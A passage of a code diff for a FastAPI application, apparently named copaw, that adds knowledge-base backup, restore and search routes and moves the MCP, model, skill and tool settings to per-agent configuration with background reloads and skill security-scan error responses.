saved_root = _manager().save_uploaded_directory(source_id, saved_pairs) + return { + "location": str(saved_root), + "file_count": len(saved_pairs), + } + + +@router.delete("/sources/{source_id}") +async def delete_source(source_id: str): + config = load_config() + _ensure_knowledge_enabled(config) + source = _find_source(config.knowledge, source_id) + if source is None: + raise HTTPException(status_code=404, detail="KNOWLEDGE_SOURCE_NOT_FOUND") + config.knowledge.sources = [ + item for item in config.knowledge.sources if item.id != source_id + ] + save_config(config) + _manager().delete_index(source_id) + return {"deleted": True, "source_id": source_id} + + +@router.delete("/clear") +async def clear_knowledge( + confirm: bool = Query(default=False), + remove_sources: bool = Query(default=True), +): + """Clear all persisted knowledge data and optionally remove source configs.""" + if not confirm: + raise HTTPException(status_code=400, detail="KNOWLEDGE_CLEAR_CONFIRM_REQUIRED") + + config = load_config() + _ensure_knowledge_enabled(config) + result = _manager().clear_knowledge( + config.knowledge, + remove_sources=remove_sources, + ) + save_config(config) + return result + + +@router.post("/sources/{source_id}/index") +async def index_source(source_id: str): + config = load_config() + _ensure_knowledge_enabled(config) + source = _find_source(config.knowledge, source_id) + if source is None: + raise HTTPException(status_code=404, detail="KNOWLEDGE_SOURCE_NOT_FOUND") + try: + result = _manager().index_source( + source, + config.knowledge, + config.agents.running, + ) + except (FileNotFoundError, ValueError, OSError) as exc: + raise HTTPException(status_code=400, detail=str(exc)) from exc + except Exception as exc: + raise HTTPException(status_code=502, detail=str(exc)) from exc + return result + + +@router.get("/sources/{source_id}/content") +async def get_source_content(source_id: str): + config = load_config() + source = _find_source(config.knowledge, source_id) + if 
source is None: + raise HTTPException(status_code=404, detail="KNOWLEDGE_SOURCE_NOT_FOUND") + return _manager().get_source_documents(source_id) + + +@router.post("/index") +async def index_all_sources(): + config = load_config() + _ensure_knowledge_enabled(config) + try: + return _manager().index_all(config.knowledge, config.agents.running) + except (FileNotFoundError, ValueError, OSError) as exc: + raise HTTPException(status_code=400, detail=str(exc)) from exc + except Exception as exc: + raise HTTPException(status_code=502, detail=str(exc)) from exc + + +@router.get("/search") +async def search_knowledge( + q: str = Query(..., min_length=1), + limit: int = Query(default=10, ge=1, le=50), + source_ids: Optional[str] = Query(default=None), + source_types: Optional[str] = Query(default=None), +): + config = load_config() + _ensure_knowledge_enabled(config) + ids = [item for item in (source_ids or "").split(",") if item] + types = [item for item in (source_types or "").split(",") if item] + return _manager().search( + query=q, + config=config.knowledge, + limit=limit, + source_ids=ids or None, + source_types=types or None, + ) + + +@router.get("/history-backfill/status") +async def get_history_backfill_status(): + """Get history backfill status for knowledge enable flow and CTA display.""" + return _manager().history_backfill_status() + + +@router.post("/history-backfill/run") +async def run_history_backfill_now(): + """Run history backfill immediately regardless of runtime auto-backfill toggle.""" + config = load_config() + _ensure_knowledge_enabled(config) + manager = _manager() + running = config.agents.running + force_running = SimpleNamespace( + knowledge_auto_collect_chat_files=running.knowledge_auto_collect_chat_files, + knowledge_auto_collect_chat_urls=running.knowledge_auto_collect_chat_urls, + knowledge_auto_collect_long_text=running.knowledge_auto_collect_long_text, + knowledge_long_text_min_chars=running.knowledge_long_text_min_chars, + 
knowledge_chunk_size=running.knowledge_chunk_size, + ) + result = await asyncio.to_thread( + manager.auto_backfill_history_data, + config.knowledge, + force_running, + ) + if result.get("changed"): + save_config(config) + return { + "result": result, + "status": manager.history_backfill_status(), + } + + +@router.get("/memify/jobs/{job_id}") +async def get_memify_job_status(job_id: str): + """Get status of a memify enrichment job.""" + normalized_job_id = (job_id or "").strip() + if not normalized_job_id: + raise HTTPException(status_code=400, detail="MEMIFY_JOB_ID_REQUIRED") + + config = load_config() + _ensure_knowledge_enabled(config) + if not config.knowledge.enabled: + raise HTTPException(status_code=400, detail="KNOWLEDGE_DISABLED") + if not bool(getattr(config.knowledge, "memify_enabled", False)): + raise HTTPException(status_code=400, detail="MEMIFY_DISABLED") + + manager = GraphOpsManager(WORKING_DIR) + payload = manager.get_memify_status(normalized_job_id) + if payload is None: + raise HTTPException(status_code=404, detail="MEMIFY_JOB_NOT_FOUND") + return payload + + +@router.websocket("/history-backfill/progress/ws") +async def stream_history_backfill_progress(websocket: WebSocket): + """Stream history backfill progress to console with WebSocket.""" + await websocket.accept() + interval_ms = _clamp_int( + websocket.query_params.get("interval_ms"), + default=1000, + minimum=300, + maximum=3000, + ) + + last_fingerprint: str | None = None + try: + while True: + progress = _manager().get_history_backfill_progress() + fingerprint = json.dumps( + progress, + ensure_ascii=False, + sort_keys=True, + default=str, + ) + if fingerprint != last_fingerprint: + await websocket.send_json( + { + "type": "snapshot", + "progress": progress, + } + ) + last_fingerprint = fingerprint + await asyncio.sleep(interval_ms / 1000) + except WebSocketDisconnect: + return + + +@router.get("/backup") +async def backup_knowledge(): + manager = _manager() + if not 
manager.root_dir.exists(): + raise HTTPException(status_code=404, detail="KNOWLEDGE_NOT_FOUND") + + buf = await asyncio.to_thread(_zip_path, manager.root_dir) + timestamp = datetime.now(timezone.utc).strftime("%Y%m%d_%H%M%S") + filename = f"copaw_knowledge_{timestamp}.zip" + return StreamingResponse( + buf, + media_type="application/zip", + headers={ + "Content-Disposition": f'attachment; filename="{filename}"', + }, + ) + + +@router.get("/backup/{source_id}") +async def backup_knowledge_source(source_id: str): + manager = _manager() + source_dir = manager.get_source_storage_dir(source_id) + if not source_dir.exists() or not source_dir.is_dir(): + raise HTTPException(status_code=404, detail="KNOWLEDGE_SOURCE_NOT_FOUND") + + buf = await asyncio.to_thread(_zip_path, source_dir) + timestamp = datetime.now(timezone.utc).strftime("%Y%m%d_%H%M%S") + safe_name = manager._safe_name(source_id) + filename = f"copaw_knowledge_{safe_name}_{timestamp}.zip" + return StreamingResponse( + buf, + media_type="application/zip", + headers={ + "Content-Disposition": f'attachment; filename="{filename}"', + }, + ) + + +@router.post("/restore") +async def restore_knowledge_backup( + file: UploadFile = File(...), + replace_existing: bool = Query(default=True), +): + if file.content_type and file.content_type not in { + "application/zip", + "application/x-zip-compressed", + "application/octet-stream", + }: + raise HTTPException( + status_code=400, + detail=f"Expected a zip file, got content-type: {file.content_type}", + ) + + data = await file.read() + _validate_zip_data(data) + + manager = _manager() + tmp_dir: Path | None = None + try: + tmp_dir = await asyncio.to_thread(_extract_zip_to_temp, data) + extract_root = _detect_extract_root(tmp_dir) + if not (extract_root / "sources").is_dir(): + raise HTTPException( + status_code=400, + detail="Invalid knowledge backup: missing sources directory", + ) + + if replace_existing and manager.root_dir.exists(): + shutil.rmtree(manager.root_dir, 
ignore_errors=True) + + manager.root_dir.mkdir(parents=True, exist_ok=True) + for item in extract_root.iterdir(): + dest = manager.root_dir / item.name + if item.is_file(): + shutil.copy2(item, dest) + else: + if dest.exists() and dest.is_file(): + dest.unlink() + shutil.copytree(item, dest, dirs_exist_ok=True) + + manager.sources_dir.mkdir(parents=True, exist_ok=True) + manager.uploads_dir.mkdir(parents=True, exist_ok=True) + manager.remote_blob_dir.mkdir(parents=True, exist_ok=True) + manager.remote_meta_dir.mkdir(parents=True, exist_ok=True) + + config = load_config() + config.knowledge.sources = manager.list_sources_from_storage() + save_config(config) + + return { + "success": True, + "replace_existing": replace_existing, + "restored_sources": len(config.knowledge.sources), + } + finally: + if tmp_dir and tmp_dir.exists(): + shutil.rmtree(tmp_dir, ignore_errors=True) \ No newline at end of file diff --git a/src/copaw/app/routers/mcp.py b/src/copaw/app/routers/mcp.py index e647519be..d5c480925 100644 --- a/src/copaw/app/routers/mcp.py +++ b/src/copaw/app/routers/mcp.py @@ -5,10 +5,9 @@ from typing import Dict, List, Optional, Literal -from fastapi import APIRouter, Body, HTTPException, Path +from fastapi import APIRouter, Body, HTTPException, Path, Request from pydantic import BaseModel, Field -from ...config import load_config, save_config from ...config.config import MCPClientConfig router = APIRouter(prefix="/mcp", tags=["mcp"]) @@ -194,12 +193,18 @@ def _build_client_info(key: str, client: MCPClientConfig) -> MCPClientInfo: response_model=List[MCPClientInfo], summary="List all MCP clients", ) -async def list_mcp_clients() -> List[MCPClientInfo]: +async def list_mcp_clients(request: Request) -> List[MCPClientInfo]: """Get list of all configured MCP clients.""" - config = load_config() + from ..agent_context import get_agent_for_request + + agent = await get_agent_for_request(request) + mcp_config = agent.config.mcp + if mcp_config is None or not 
mcp_config.clients: + return [] + return [ _build_client_info(key, client) - for key, client in config.mcp.clients.items() + for key, client in mcp_config.clients.items() ] @@ -208,10 +213,19 @@ async def list_mcp_clients() -> List[MCPClientInfo]: response_model=MCPClientInfo, summary="Get MCP client details", ) -async def get_mcp_client(client_key: str = Path(...)) -> MCPClientInfo: +async def get_mcp_client( + request: Request, + client_key: str = Path(...), +) -> MCPClientInfo: """Get details of a specific MCP client.""" - config = load_config() - client = config.mcp.clients.get(client_key) + from ..agent_context import get_agent_for_request + + agent = await get_agent_for_request(request) + mcp_config = agent.config.mcp + if mcp_config is None: + raise HTTPException(404, detail=f"MCP client '{client_key}' not found") + + client = mcp_config.clients.get(client_key) if client is None: raise HTTPException(404, detail=f"MCP client '{client_key}' not found") return _build_client_info(client_key, client) @@ -224,14 +238,22 @@ async def get_mcp_client(client_key: str = Path(...)) -> MCPClientInfo: status_code=201, ) async def create_mcp_client( + request: Request, client_key: str = Body(..., embed=True), client: MCPClientCreateRequest = Body(..., embed=True), ) -> MCPClientInfo: """Create a new MCP client configuration.""" - config = load_config() + from ..agent_context import get_agent_for_request + from ...config.config import save_agent_config, MCPConfig + + agent = await get_agent_for_request(request) + + # Initialize mcp config if not exists + if agent.config.mcp is None: + agent.config.mcp = MCPConfig(clients={}) # Check if client already exists - if client_key in config.mcp.clients: + if client_key in agent.config.mcp.clients: raise HTTPException( 400, detail=f"MCP client '{client_key}' already exists. 
Use PUT to " @@ -252,9 +274,29 @@ async def create_mcp_client( cwd=client.cwd, ) - # Add to config and save - config.mcp.clients[client_key] = new_client - save_config(config) + # Add to agent's config and save + agent.config.mcp.clients[client_key] = new_client + save_agent_config(agent.agent_id, agent.config) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager and agent_id before creating background task + # to avoid accessing request/workspace after their lifecycle ends + import asyncio + + manager = request.app.state.multi_agent_manager + agent_id = agent.agent_id + + async def reload_in_background(): + try: + await manager.reload_agent(agent_id) + except Exception as e: + import logging + + logging.getLogger(__name__).warning( + f"Background reload failed: {e}", + ) + + asyncio.create_task(reload_in_background()) return _build_client_info(client_key, new_client) @@ -265,17 +307,21 @@ async def create_mcp_client( summary="Update an MCP client", ) async def update_mcp_client( + request: Request, client_key: str = Path(...), updates: MCPClientUpdateRequest = Body(...), ) -> MCPClientInfo: """Update an existing MCP client configuration.""" - config = load_config() + from ..agent_context import get_agent_for_request + from ...config.config import save_agent_config - # Check if client exists - existing = config.mcp.clients.get(client_key) - if existing is None: + agent = await get_agent_for_request(request) + + if agent.config.mcp is None or client_key not in agent.config.mcp.clients: raise HTTPException(404, detail=f"MCP client '{client_key}' not found") + existing = agent.config.mcp.clients[client_key] + # Update fields if provided update_data = updates.model_dump(exclude_unset=True) @@ -288,10 +334,30 @@ async def update_mcp_client( merged_data = existing.model_dump(mode="json") merged_data.update(update_data) updated_client = MCPClientConfig.model_validate(merged_data) - config.mcp.clients[client_key] = updated_client + 
agent.config.mcp.clients[client_key] = updated_client # Save updated config - save_config(config) + save_agent_config(agent.agent_id, agent.config) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager and agent_id before creating background task + # to avoid accessing request/workspace after their lifecycle ends + import asyncio + + manager = request.app.state.multi_agent_manager + agent_id = agent.agent_id + + async def reload_in_background(): + try: + await manager.reload_agent(agent_id) + except Exception as e: + import logging + + logging.getLogger(__name__).warning( + f"Background reload failed: {e}", + ) + + asyncio.create_task(reload_in_background()) return _build_client_info(client_key, updated_client) @@ -302,18 +368,43 @@ async def update_mcp_client( summary="Toggle MCP client enabled status", ) async def toggle_mcp_client( + request: Request, client_key: str = Path(...), ) -> MCPClientInfo: """Toggle the enabled status of an MCP client.""" - config = load_config() + from ..agent_context import get_agent_for_request + from ...config.config import save_agent_config - client = config.mcp.clients.get(client_key) - if client is None: + agent = await get_agent_for_request(request) + + if agent.config.mcp is None or client_key not in agent.config.mcp.clients: raise HTTPException(404, detail=f"MCP client '{client_key}' not found") + client = agent.config.mcp.clients[client_key] + # Toggle enabled status client.enabled = not client.enabled - save_config(config) + save_agent_config(agent.agent_id, agent.config) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager and agent_id before creating background task + # to avoid accessing request/workspace after their lifecycle ends + import asyncio + + manager = request.app.state.multi_agent_manager + agent_id = agent.agent_id + + async def reload_in_background(): + try: + await manager.reload_agent(agent_id) + except Exception as e: + import logging + + 
logging.getLogger(__name__).warning( + f"Background reload failed: {e}", + ) + + asyncio.create_task(reload_in_background()) return _build_client_info(client_key, client) @@ -324,16 +415,40 @@ async def toggle_mcp_client( summary="Delete an MCP client", ) async def delete_mcp_client( + request: Request, client_key: str = Path(...), ) -> Dict[str, str]: """Delete an MCP client configuration.""" - config = load_config() + from ..agent_context import get_agent_for_request + from ...config.config import save_agent_config - if client_key not in config.mcp.clients: + agent = await get_agent_for_request(request) + + if agent.config.mcp is None or client_key not in agent.config.mcp.clients: raise HTTPException(404, detail=f"MCP client '{client_key}' not found") # Remove client - del config.mcp.clients[client_key] - save_config(config) + del agent.config.mcp.clients[client_key] + save_agent_config(agent.agent_id, agent.config) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager and agent_id before creating background task + # to avoid accessing request/workspace after their lifecycle ends + import asyncio + + manager = request.app.state.multi_agent_manager + agent_id = agent.agent_id + + async def reload_in_background(): + try: + await manager.reload_agent(agent_id) + except Exception as e: + import logging + + logging.getLogger(__name__).warning( + f"Background reload failed: {e}", + ) + + asyncio.create_task(reload_in_background()) return {"message": f"MCP client '{client_key}' deleted successfully"} diff --git a/src/copaw/app/routers/providers.py b/src/copaw/app/routers/providers.py index 1fba69b5b..c6af4c1f8 100644 --- a/src/copaw/app/routers/providers.py +++ b/src/copaw/app/routers/providers.py @@ -3,18 +3,29 @@ from __future__ import annotations +import logging from typing import List, Literal, Optional from copy import deepcopy from fastapi import APIRouter, Body, Depends, HTTPException, Path, Request from pydantic import BaseModel, Field +from 
..agent_context import get_agent_for_request +from ...config.config import load_agent_config, save_agent_config from ...providers.provider import ProviderInfo, ModelInfo from ...providers.provider_manager import ActiveModelsInfo, ProviderManager +from ...providers.models import ModelSlotConfig + + +logger = logging.getLogger(__name__) router = APIRouter(prefix="/models", tags=["models"]) -ChatModelName = Literal["OpenAIChatModel", "AnthropicChatModel"] +ChatModelName = Literal[ + "OpenAIChatModel", + "AnthropicChatModel", + "GeminiChatModel", +] def get_provider_manager(request: Request) -> ProviderManager: @@ -353,9 +364,37 @@ async def remove_model_endpoint( summary="Get active LLM", ) async def get_active_models( + request: Request, manager: ProviderManager = Depends(get_provider_manager), ) -> ActiveModelsInfo: - return ActiveModelsInfo(active_llm=manager.get_active_model()) + """Get active model (agent-specific or global fallback).""" + # Try to get agent-specific active model + try: + workspace = await get_agent_for_request(request) + logger.debug( + f"get_active_models: got workspace.agent_id={workspace.agent_id}", + ) + agent_config = load_agent_config(workspace.agent_id) + logger.debug( + f"get_active_models: agent_config.active_model=" + f"{agent_config.active_model}", + ) + if agent_config.active_model: + logger.info( + f"Returning agent-specific model for {workspace.agent_id}: " + f"{agent_config.active_model}", + ) + return ActiveModelsInfo(active_llm=agent_config.active_model) + except Exception as e: + logger.warning( + f"Failed to get agent-specific model: {e}", + exc_info=True, + ) + + # Fallback to global active model + global_model = manager.get_active_model() + logger.info(f"Returning global model: {global_model}") + return ActiveModelsInfo(active_llm=global_model) @router.put( @@ -364,17 +403,34 @@ async def get_active_models( summary="Set active LLM", ) async def set_active_model( + request: Request, manager: ProviderManager = 
Depends(get_provider_manager), body: ModelSlotRequest = Body(...), ) -> ActiveModelsInfo: + """Set active model for current agent.""" + # Validate provider and model exist try: await manager.activate_model(body.provider_id, body.model) except ValueError as exc: message = str(exc) lower_msg = message.lower() if "provider" in lower_msg and "not found" in lower_msg: - # Missing provider raise HTTPException(status_code=404, detail=message) from exc - # Invalid model, unreachable provider, or other configuration error raise HTTPException(status_code=400, detail=message) from exc + + # Save to agent config + try: + workspace = await get_agent_for_request(request) + agent_config = load_agent_config(workspace.agent_id) + agent_config.active_model = ModelSlotConfig( + provider_id=body.provider_id, + model=body.model, + ) + save_agent_config(workspace.agent_id, agent_config) + except Exception as e: + # Log warning but don't fail the request + logger.warning( + f"Failed to save active model to agent config: {e}", + ) + return ActiveModelsInfo(active_llm=manager.get_active_model()) diff --git a/src/copaw/app/routers/skills.py b/src/copaw/app/routers/skills.py index 96f2d312f..e3ce12fd9 100644 --- a/src/copaw/app/routers/skills.py +++ b/src/copaw/app/routers/skills.py @@ -1,22 +1,49 @@ # -*- coding: utf-8 -*- import logging from typing import Any -from fastapi import APIRouter, HTTPException +from pathlib import Path +from fastapi import APIRouter, HTTPException, Request +from fastapi.responses import JSONResponse from pydantic import BaseModel, Field from ...agents.skills_manager import ( SkillService, SkillInfo, - list_available_skills, ) from ...agents.skills_hub import ( search_hub_skills, install_skill_from_hub, ) +from ...security.skill_scanner import SkillScanError logger = logging.getLogger(__name__) +def _scan_error_response(exc: SkillScanError) -> JSONResponse: + """Build a 422 response with structured scan findings.""" + result = exc.result + return JSONResponse( + 
status_code=422, + content={ + "type": "security_scan_failed", + "detail": str(exc), + "skill_name": result.skill_name, + "max_severity": result.max_severity.value, + "findings": [ + { + "severity": f.severity.value, + "title": f.title, + "description": f.description, + "file_path": f.file_path, + "line_number": f.line_number, + "rule_id": f.rule_id, + } + for f in result.findings + ], + }, + ) + + class SkillSpec(SkillInfo): enabled: bool = False @@ -60,32 +87,76 @@ class HubInstallRequest(BaseModel): @router.get("") -async def list_skills() -> list[SkillSpec]: - all_skills = SkillService.list_all_skills() - - available_skills = list_available_skills() - skills_spec = [] - for skill in all_skills: - skills_spec.append( - SkillSpec( - **skill.model_dump(), - enabled=skill.name in available_skills, - ), +async def list_skills( + request: Request, +) -> list[SkillSpec]: + """List all skills for active agent.""" + from ..agent_context import get_agent_for_request + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + skill_service = SkillService(workspace_dir) + + # Get all skills (builtin + customized) + all_skills = skill_service.list_all_skills() + + # Get active skills to determine enabled status + active_skills_dir = workspace_dir / "active_skills" + active_skill_names = set() + if active_skills_dir.exists(): + active_skill_names = { + d.name + for d in active_skills_dir.iterdir() + if d.is_dir() and (d / "SKILL.md").exists() + } + + # Convert to SkillSpec with enabled status + skills_spec = [ + SkillSpec( + name=skill.name, + description=skill.description, + content=skill.content, + source=skill.source, + path=skill.path, + references=skill.references, + scripts=skill.scripts, + enabled=skill.name in active_skill_names, ) + for skill in all_skills + ] + return skills_spec @router.get("/available") -async def get_available_skills() -> list[SkillSpec]: - available_skills = SkillService.list_available_skills() - 
skills_spec = [] - for skill in available_skills: - skills_spec.append( - SkillSpec( - **skill.model_dump(), - enabled=True, - ), +async def get_available_skills( + request: Request, +) -> list[SkillSpec]: + """List available (enabled) skills for active agent.""" + from ..agent_context import get_agent_for_request + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + skill_service = SkillService(workspace_dir) + + # Get available (active) skills + available_skills = skill_service.list_available_skills() + + # Convert to SkillSpec + skills_spec = [ + SkillSpec( + name=skill.name, + description=skill.description, + content=skill.content, + source=skill.source, + path=skill.path, + references=skill.references, + scripts=skill.scripts, + enabled=True, ) + for skill in available_skills + ] + return skills_spec @@ -118,25 +189,35 @@ def _github_token_hint(bundle_url: str) -> str: @router.post("/hub/install") -async def install_from_hub(request: HubInstallRequest): +async def install_from_hub( + request_body: HubInstallRequest, + request: Request, +): + from ..agent_context import get_agent_for_request + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + try: result = install_skill_from_hub( - bundle_url=request.bundle_url, - version=request.version, - enable=request.enable, - overwrite=request.overwrite, + workspace_dir=workspace_dir, + bundle_url=request_body.bundle_url, + version=request_body.version, + enable=request_body.enable, + overwrite=request_body.overwrite, ) + except SkillScanError as e: + return _scan_error_response(e) except ValueError as e: detail = str(e) logger.warning( "Skill hub install 400: bundle_url=%s detail=%s", - (request.bundle_url or "")[:80], + (request_body.bundle_url or "")[:80], detail, ) raise HTTPException(status_code=400, detail=detail) from e except RuntimeError as e: - # Upstream hub is flaky/rate-limited sometimes; surface as bad 
gateway. - detail = str(e) + _github_token_hint(request.bundle_url) + detail = str(e) + _github_token_hint(request_body.bundle_url) logger.exception( "Skill hub install failed (upstream/rate limit): %s", e, @@ -144,7 +225,7 @@ async def install_from_hub(request: HubInstallRequest): raise HTTPException(status_code=502, detail=detail) from e except Exception as e: detail = f"Skill hub import failed: {e}" + _github_token_hint( - request.bundle_url, + request_body.bundle_url, ) logger.exception("Skill hub import failed: %s", e) raise HTTPException(status_code=502, detail=detail) from e @@ -157,48 +238,204 @@ async def install_from_hub(request: HubInstallRequest): @router.post("/batch-disable") -async def batch_disable_skills(skill_name: list[str]) -> None: +async def batch_disable_skills( + skill_name: list[str], + request: Request, +) -> None: + from ..agent_context import get_agent_for_request + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + skill_service = SkillService(workspace_dir) + for skill in skill_name: - SkillService.disable_skill(skill) + skill_service.disable_skill(skill) @router.post("/batch-enable") -async def batch_enable_skills(skill_name: list[str]) -> None: +async def batch_enable_skills( + skill_name: list[str], + request: Request, +): + from ..agent_context import get_agent_for_request + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + skill_service = SkillService(workspace_dir) + + blocked: list[dict] = [] for skill in skill_name: - SkillService.enable_skill(skill) + try: + skill_service.enable_skill(skill) + except SkillScanError as e: + blocked.append( + { + "skill_name": skill, + "max_severity": e.result.max_severity.value, + "detail": str(e), + }, + ) + if blocked: + return JSONResponse( + status_code=422, + content={ + "type": "security_scan_failed", + "detail": ( + f"{len(blocked)} skill(s) blocked by security scan" + ), + 
"blocked_skills": blocked, + }, + ) @router.post("") -async def create_skill(request: CreateSkillRequest): - result = SkillService.create_skill( - name=request.name, - content=request.content, - references=request.references, - scripts=request.scripts, - ) +async def create_skill( + request_body: CreateSkillRequest, + request: Request, +): + from ..agent_context import get_agent_for_request + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + skill_service = SkillService(workspace_dir) + + try: + result = skill_service.create_skill( + name=request_body.name, + content=request_body.content, + references=request_body.references, + scripts=request_body.scripts, + ) + except SkillScanError as e: + return _scan_error_response(e) return {"created": result} @router.post("/{skill_name}/disable") -async def disable_skill(skill_name: str): - result = SkillService.disable_skill(skill_name) - return {"disabled": result} +async def disable_skill( + skill_name: str, + request: Request = None, +): + """Disable skill for active agent.""" + from ..agent_context import get_agent_for_request + import shutil + import asyncio + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + active_skill_dir = workspace_dir / "active_skills" / skill_name + + if active_skill_dir.exists(): + shutil.rmtree(active_skill_dir) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager and agent_id before creating background task + # to avoid accessing request/workspace after their lifecycle ends + manager = request.app.state.multi_agent_manager + agent_id = workspace.agent_id + + async def reload_in_background(): + try: + await manager.reload_agent(agent_id) + except Exception as e: + logger.warning(f"Background reload failed: {e}") + + asyncio.create_task(reload_in_background()) + + return {"disabled": True} + + return {"disabled": False} @router.post("/{skill_name}/enable") -async def 
enable_skill(skill_name: str): - result = SkillService.enable_skill(skill_name) - return {"enabled": result} +async def enable_skill( + skill_name: str, + request: Request = None, +): + """Enable skill for active agent.""" + from ..agent_context import get_agent_for_request + import shutil + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + active_skill_dir = workspace_dir / "active_skills" / skill_name + + # If already enabled, skip + if active_skill_dir.exists(): + return {"enabled": True} + + # Find skill from builtin or customized + builtin_skill_dir = ( + Path(__file__).parent.parent.parent / "agents" / "skills" / skill_name + ) + customized_skill_dir = workspace_dir / "customized_skills" / skill_name + + source_dir = None + if customized_skill_dir.exists(): + source_dir = customized_skill_dir + elif builtin_skill_dir.exists(): + source_dir = builtin_skill_dir + + if not source_dir or not (source_dir / "SKILL.md").exists(): + raise HTTPException( + status_code=404, + detail=f"Skill '{skill_name}' not found", + ) + + # --- Security scan (pre-activation) -------------------------------- + try: + from ...security.skill_scanner import scan_skill_directory + + scan_skill_directory(source_dir, skill_name=skill_name) + except SkillScanError as e: + return _scan_error_response(e) + except Exception as scan_exc: + logger.warning( + "Security scan error for skill '%s' (non-fatal): %s", + skill_name, + scan_exc, + ) + # ------------------------------------------------------------------- + + # Copy to active_skills + shutil.copytree(source_dir, active_skill_dir) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager and agent_id before creating background task + # to avoid accessing request/workspace after their lifecycle ends + import asyncio + + manager = request.app.state.multi_agent_manager + agent_id = workspace.agent_id + + async def reload_in_background(): + try: + await 
manager.reload_agent(agent_id) + except Exception as e: + logger.warning(f"Background reload failed: {e}") + + asyncio.create_task(reload_in_background()) + + return {"enabled": True} @router.delete("/{skill_name}") -async def delete_skill(skill_name: str): +async def delete_skill( + skill_name: str, + request: Request, +): """Delete a skill from customized_skills directory permanently. This only deletes skills from customized_skills directory. Built-in skills cannot be deleted. """ - result = SkillService.delete_skill(skill_name) + from ..agent_context import get_agent_for_request + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + skill_service = SkillService(workspace_dir) + + result = skill_service.delete_skill(skill_name) return {"deleted": result} @@ -207,6 +444,7 @@ async def load_skill_file( skill_name: str, source: str, file_path: str, + request: Request, ): """Load a specific file from a skill's references or scripts directory. 
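Review note: the "hot reload config (async, non-blocking)" block above is copy-pasted near-verbatim into the MCP create/update/toggle/delete handlers and the skills/tools routers. It could be factored into one helper that captures the manager and agent id eagerly, exactly as the repeated IMPORTANT comment requires. A sketch, assuming only the `request.app.state.multi_agent_manager` attribute and `reload_agent` coroutine already shown in this diff (the helper name is illustrative):

```python
import asyncio
import logging
from types import SimpleNamespace

logger = logging.getLogger(__name__)


def schedule_agent_reload(request, agent_id: str) -> "asyncio.Task":
    """Schedule a non-blocking agent reload after a config change.

    The manager and agent_id are captured *before* the task is created,
    so the background coroutine never touches the request or workspace
    after their lifecycle ends.
    """
    manager = request.app.state.multi_agent_manager

    async def _reload() -> None:
        try:
            await manager.reload_agent(agent_id)
        except Exception as exc:  # a failed reload must not undo the saved config
            logger.warning("Background reload failed: %s", exc)

    return asyncio.create_task(_reload())
```

Each handler body would then shrink to `schedule_agent_reload(request, agent.agent_id)` before its return statement.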
@@ -226,7 +464,13 @@ async def load_skill_file( GET /skills/builtin_skill/files/builtin/scripts/utils/helper.py """ - content = SkillService.load_skill_file( + from ..agent_context import get_agent_for_request + + workspace = await get_agent_for_request(request) + workspace_dir = Path(workspace.workspace_dir) + skill_service = SkillService(workspace_dir) + + content = skill_service.load_skill_file( skill_name=skill_name, file_path=file_path, source=source, diff --git a/src/copaw/app/routers/tools.py b/src/copaw/app/routers/tools.py index 1f334b3f5..b88336d0e 100644 --- a/src/copaw/app/routers/tools.py +++ b/src/copaw/app/routers/tools.py @@ -5,10 +5,15 @@ from typing import List -from fastapi import APIRouter, HTTPException, Path +from fastapi import ( + APIRouter, + HTTPException, + Path, + Request, +) from pydantic import BaseModel, Field -from ...config import load_config, save_config +from ...config import load_config router = APIRouter(prefix="/tools", tags=["tools"]) @@ -22,20 +27,33 @@ class ToolInfo(BaseModel): @router.get("", response_model=List[ToolInfo]) -async def list_tools() -> List[ToolInfo]: - """List all built-in tools and their enabled status. +async def list_tools( + request: Request, +) -> List[ToolInfo]: + """List all built-in tools and enabled status for active agent. 
Returns: List of tool information """ - config = load_config() + from ..agent_context import get_agent_for_request + from ...config.config import load_agent_config + + workspace = await get_agent_for_request(request) + agent_config = load_agent_config(workspace.agent_id) # Ensure tools config exists with defaults - if not hasattr(config, "tools"): - config.tools = {} + if not agent_config.tools or not agent_config.tools.builtin_tools: + # Fallback to global config if agent config has no tools + config = load_config() + tools_config = config.tools if hasattr(config, "tools") else None + if not tools_config: + return [] + builtin_tools = tools_config.builtin_tools + else: + builtin_tools = agent_config.tools.builtin_tools tools_list = [] - for tool_config in config.tools.builtin_tools.values(): + for tool_config in builtin_tools.values(): tools_list.append( ToolInfo( name=tool_config.name, @@ -48,11 +66,15 @@ async def list_tools() -> List[ToolInfo]: @router.patch("/{tool_name}/toggle", response_model=ToolInfo) -async def toggle_tool(tool_name: str = Path(...)) -> ToolInfo: - """Toggle tool enabled status. +async def toggle_tool( + tool_name: str = Path(...), + request: Request = None, +) -> ToolInfo: + """Toggle tool enabled status for active agent. 
Args: tool_name: Tool function name + request: FastAPI request Returns: Updated tool information @@ -60,21 +82,49 @@ async def toggle_tool(tool_name: str = Path(...)) -> ToolInfo: Raises: HTTPException: If tool not found """ - config = load_config() + from ..agent_context import get_agent_for_request + from ...config.config import load_agent_config, save_agent_config + + workspace = await get_agent_for_request(request) + agent_config = load_agent_config(workspace.agent_id) - if tool_name not in config.tools.builtin_tools: + if ( + not agent_config.tools + or tool_name not in agent_config.tools.builtin_tools + ): raise HTTPException( status_code=404, detail=f"Tool '{tool_name}' not found", ) # Toggle enabled status - tool_config = config.tools.builtin_tools[tool_name] + tool_config = agent_config.tools.builtin_tools[tool_name] tool_config.enabled = not tool_config.enabled - # Save config - save_config(config) + # Save agent config + save_agent_config(workspace.agent_id, agent_config) + + # Hot reload config (async, non-blocking) + # IMPORTANT: Get manager and agent_id before creating background task + # to avoid accessing request/workspace after their lifecycle ends + import asyncio + + manager = request.app.state.multi_agent_manager + agent_id = workspace.agent_id + + async def 